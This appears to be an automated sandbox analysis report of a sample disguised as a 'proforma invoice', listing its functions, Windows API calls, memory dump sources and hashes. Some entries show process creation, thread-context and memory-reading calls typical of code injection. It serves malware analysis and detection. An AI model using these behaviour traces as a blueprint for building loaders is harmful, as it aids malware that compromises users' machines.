                  APIs
                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00B12CD4,?,?,?,00000004,00000001), ref: 00B12FF2
                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B13006
                  • CloseHandle.KERNEL32(00000000,?,00B12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B1300D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: File$CloseCreateHandleTime
                  • String ID:
                  • API String ID: 3397143404-0
                  • Opcode ID: 19f946fc115328531cf2995bfbae060d9333ac61dcd0fe98dcdd74481076c3a9
                  • Instruction ID: 05b14bf4ff7330c7afcc80a7063a458893e18b1e6f7ee5b01b5d6596a34fefe3
                  • Opcode Fuzzy Hash: 19f946fc115328531cf2995bfbae060d9333ac61dcd0fe98dcdd74481076c3a9
                  • Instruction Fuzzy Hash: C2E0863228061077D2301795BC0DFCF3E5CD78AF71F204210F719760D04AA0590153A8
                  Function 00AB1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 00AB17F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: CALL
                  • API String ID: 1385522511-4196123274
                  • Opcode ID: 3909e139d0c8e54f4acdb402febee89ef401b5b56b4f312220aefbea3cf0c698
                  • Instruction ID: 560ebead766195665d5c8d34b91e5575aa9704b2068fc076f93ef5a2fe500a1e
                  • Opcode Fuzzy Hash: 3909e139d0c8e54f4acdb402febee89ef401b5b56b4f312220aefbea3cf0c698
                  • Instruction Fuzzy Hash: 51229D70608301DFC714DF14C5A0AAABBF9BF85314F688A5DF5968B3A2D731E845CB92
                  Function 00B16EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 00B16F6B
                    • Part of subcall function 00AA4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LibraryLoad_wcslen
                  • String ID: >>>AUTOIT SCRIPT<<<
                  • API String ID: 3312870042-2806939583
                  • Opcode ID: 209a9fe49691439047aac8b558a81e9655a45795baabdcbf6258e0e6a9050826
                  • Instruction ID: 1db5d5c0eb1b841c2188220d5746cc01351c6029cd31ea63c4bf80c7da0cb430
                  • Opcode Fuzzy Hash: 209a9fe49691439047aac8b558a81e9655a45795baabdcbf6258e0e6a9050826
                  • Instruction Fuzzy Hash: 3BB180315082019FCB14EF20C9919AFB7E5EF99310F54895DF496972A2EF30ED89CB92
                  Function 00AA2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                  Download Yara Rule
                  APIs
                  • GetOpenFileNameW.COMDLG32(?), ref: 00AE2C8C
                    • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                    • Part of subcall function 00AA2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA2DC4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Name$Path$FileFullLongOpen
                  • String ID: X
                  • API String ID: 779396738-3081909835
                  • Opcode ID: 0803ef4439ec8bea52cd00fc473689ddececb4cc96e866101faaf8bec706c269
                  • Instruction ID: a393f0f79a8c1b2ca6d93ac26e5edd9070953d08ba24f09558c748cab1af95dd
                  • Opcode Fuzzy Hash: 0803ef4439ec8bea52cd00fc473689ddececb4cc96e866101faaf8bec706c269
                  • Instruction Fuzzy Hash: A921A871A002989FDF01DF98C945BDE7BFC9F49304F104059E405B7281DFB859898FA1
                  Function 00B12557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID: EA06
                  • API String ID: 2638373210-3962188686
                  • Opcode ID: 918f04da0a775a877c578b6d5423f892c1bb212829f67503948ebc637b1d85b5
                  • Instruction ID: fa2c6f4c1e6404344396a638957603a37e8cedfaa2b06432f9116c48c487781a
                  • Opcode Fuzzy Hash: 918f04da0a775a877c578b6d5423f892c1bb212829f67503948ebc637b1d85b5
                  • Instruction Fuzzy Hash: 0401B172944258BEDF28C7A8C856FEEBBF8DB15301F00459EE192D2181E5B8E6188B60
                  Function 00AA3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                  Download Yara Rule
                  APIs
                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA3908
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconNotifyShell_
                  • String ID:
                  • API String ID: 1144537725-0
                  • Opcode ID: d86bec8e77fb3045c9d3aa55e72ae07c948b5a72a3cd596011b777ab27b6e173
                  • Instruction ID: 5a57c159e7f44b8cc7016b5b309a4fd1d3c40c103adbb477350b5b9abc809609
                  • Opcode Fuzzy Hash: d86bec8e77fb3045c9d3aa55e72ae07c948b5a72a3cd596011b777ab27b6e173
                  • Instruction Fuzzy Hash: 2B319371504301DFD720DF68D88579BBBE8FB49708F10092EF59A97280EB75AA48CB52
                  Function 00AA6D9E Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00ABCF58,?,?,?), ref: 00AA6DBA
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00ABCF58,?,?,?), ref: 00AA6DED
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide
                  • String ID:
                  • API String ID: 626452242-0
                  • Opcode ID: a2e06d76c446ba2fd8380a2b96c58b4523ef119c02f6461ab66c3cc8a7d96bc5
                  • Instruction ID: 022f071d4e1dc6eceabfa74f0d9b27cc85ebb1da5162b0954ece1a34a04b8cf7
                  • Opcode Fuzzy Hash: a2e06d76c446ba2fd8380a2b96c58b4523ef119c02f6461ab66c3cc8a7d96bc5
                  • Instruction Fuzzy Hash: C80184713042047FEB295BA99D4BFAF7AADDB85750F14002DB106E71E1DAA1AD009664
                  Function 00AAB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 00AABB4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID:
                  • API String ID: 1385522511-0
                  • Opcode ID: 62b7fbec8f96a602479208cc39a984b540507ceb1b2547a32bdb15d3e0c4248d
                  • Instruction ID: 16804dc06ba495fb6ef365ea7c165b431160bbad3329cebfdd8797b0bd1c79df
                  • Opcode Fuzzy Hash: 62b7fbec8f96a602479208cc39a984b540507ceb1b2547a32bdb15d3e0c4248d
                  • Instruction Fuzzy Hash: 1D32AF35A00209DFDB20CF94C994EBEB7F9EF46310F158059EA15AB292D774ED81CBA1
                  Function 0210129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 02101A5B
                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02101AF1
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02101B13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                  • String ID:
                  • API String ID: 2438371351-0
                  • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                  • Instruction ID: 146f91b549b42fadfa0904206f5ccb7e7b4948af24355167dae85156c4f4ef5b
                  • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                  • Instruction Fuzzy Hash: EF12BE24E14658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E7BA4F81CF5A
                  Function 00AA4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E9C
                    • Part of subcall function 00AA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4EAE
                    • Part of subcall function 00AA4E90: FreeLibrary.KERNEL32(00000000,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EC0
                  • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EFD
                    • Part of subcall function 00AA4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E62
                    • Part of subcall function 00AA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4E74
                    • Part of subcall function 00AA4E59: FreeLibrary.KERNEL32(00000000,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E87
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$Load$AddressFreeProc
                  • String ID:
                  • API String ID: 2632591731-0
                  • Opcode ID: f63a4bb7e9e0fdba085bb8ff09691261110ae45a6d37ac392fd5d8a9c6b5d4a9
                  • Instruction ID: a011fd08c387246729e229da90b94917d1b68460519b128888edc472467c7642
                  • Opcode Fuzzy Hash: f63a4bb7e9e0fdba085bb8ff09691261110ae45a6d37ac392fd5d8a9c6b5d4a9
                  • Instruction Fuzzy Hash: 5D11C432610205AECF24EB60DE06FAD77A59F89B10F20442DF552A71D1EFB0AA459750
                  Function 00AD8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __wsopen_s
                  • String ID:
                  • API String ID: 3347428461-0
                  • Opcode ID: 2904d9ab450cf35374a0b7ce9bbee8bb7bfcb6f6ad0fd2bfc8c2394e5235def5
                  • Instruction ID: 512ed111cadafb47f1db1dd8d4e36807a919b9cb760d1b07d081b143d4dc10b7
                  • Opcode Fuzzy Hash: 2904d9ab450cf35374a0b7ce9bbee8bb7bfcb6f6ad0fd2bfc8c2394e5235def5
                  • Instruction Fuzzy Hash: 7C1118B590410AAFCB05DF58E941A9B7BF5FF48314F10405AF809AB312DB31EA11CBA5
                  Function 00ACE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                  • Instruction ID: 1f7b490ba3b0063032b5f82e03b915a5691d48fff2b89119b367ca7ff1b3f61a
                  • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                  • Instruction Fuzzy Hash: 8CF02836521A109BDB317B798E05F5A339D9F62330F12072EF422933D2DB74E801C6A5
                  Function 00AD3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 02a59980d54daa772649952d26e59eb9939b4fd1aaa02a15ec1b535c4ddf1b9f
                  • Instruction ID: d95c1bf2f30061fdba0e9581b43327a6ab11306040d0b2b272a16afe34cf05cd
                  • Opcode Fuzzy Hash: 02a59980d54daa772649952d26e59eb9939b4fd1aaa02a15ec1b535c4ddf1b9f
                  • Instruction Fuzzy Hash: A2E0E53310232466DE212B779D00F9E3A5AAB427B0F1A0026BC16A7680CB50DD01A2E6
                  Function 00AA4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNEL32(?,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4F6D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 62dbaa770aba568e65594cd8507332c9e16d0ed0862219df8dc395cf447ee7f6
                  • Instruction ID: 0af576f77ab49cb0ca65c8fad3febba864abec81fe9a77e4b9dab050167ed0b0
                  • Opcode Fuzzy Hash: 62dbaa770aba568e65594cd8507332c9e16d0ed0862219df8dc395cf447ee7f6
                  • Instruction Fuzzy Hash: 58F0A971105742CFDB348F60D49082ABBF0AF4A729320997EF1EA83660CBB19844EF00
                  Function 00AA2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                  Download Yara Rule
                  APIs
                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA2DC4
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LongNamePath_wcslen
                  • String ID:
                  • API String ID: 541455249-0
                  • Opcode ID: 0304fb3f1243d61acbcbbb5ef5c30d29157a5944f4d36d6b90d5663dd75f4aa7
                  • Instruction ID: 0f12487396f2dd49e446c5e2068aa6609beacb7d7ccfa67f12f92c9c3834ed18
                  • Opcode Fuzzy Hash: 0304fb3f1243d61acbcbbb5ef5c30d29157a5944f4d36d6b90d5663dd75f4aa7
                  • Instruction Fuzzy Hash: ACE0CD726001345BC711A6989D05FDE77DDDFC8790F040075FD09E7248DA70AD808690
                  Function 00B12693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID:
                  • API String ID: 2638373210-0
                  • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                  • Instruction ID: 01e20f1c79c26f656a4e70b6642a1e9b55d44abafbcce845997ef510fe97fe22
                  • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                  • Instruction Fuzzy Hash: 25E04FB1609B005FDF399B28A951BF677E8DF49300F00086EF69B82352E57268958A4D
                  Function 00AA2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA3908
                    • Part of subcall function 00AAD730: GetInputState.USER32 ref: 00AAD807
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AA2B6B
                    • Part of subcall function 00AA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AA314E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconNotifyShell_$CurrentDirectoryInputState
                  • String ID:
                  • API String ID: 3667716007-0
                  • Opcode ID: 13b869e2330c845d76dbdb7578e2920e860deea767befb1e2484b857996fdb0f
                  • Instruction ID: 09f06f76b701bfd95d8532b54dfd5957c4a7cd491054203a4d25a23fde954852
                  • Opcode Fuzzy Hash: 13b869e2330c845d76dbdb7578e2920e860deea767befb1e2484b857996fdb0f
                  • Instruction Fuzzy Hash: 9DE0262330020407CA08BB78A91257DA7498BD7351F00087EF147432E2CF2445454322
                  Function 00AE039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(00000000,00000000,?,00AE0704,?,?,00000000,?,00AE0704,00000000,0000000C), ref: 00AE03B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
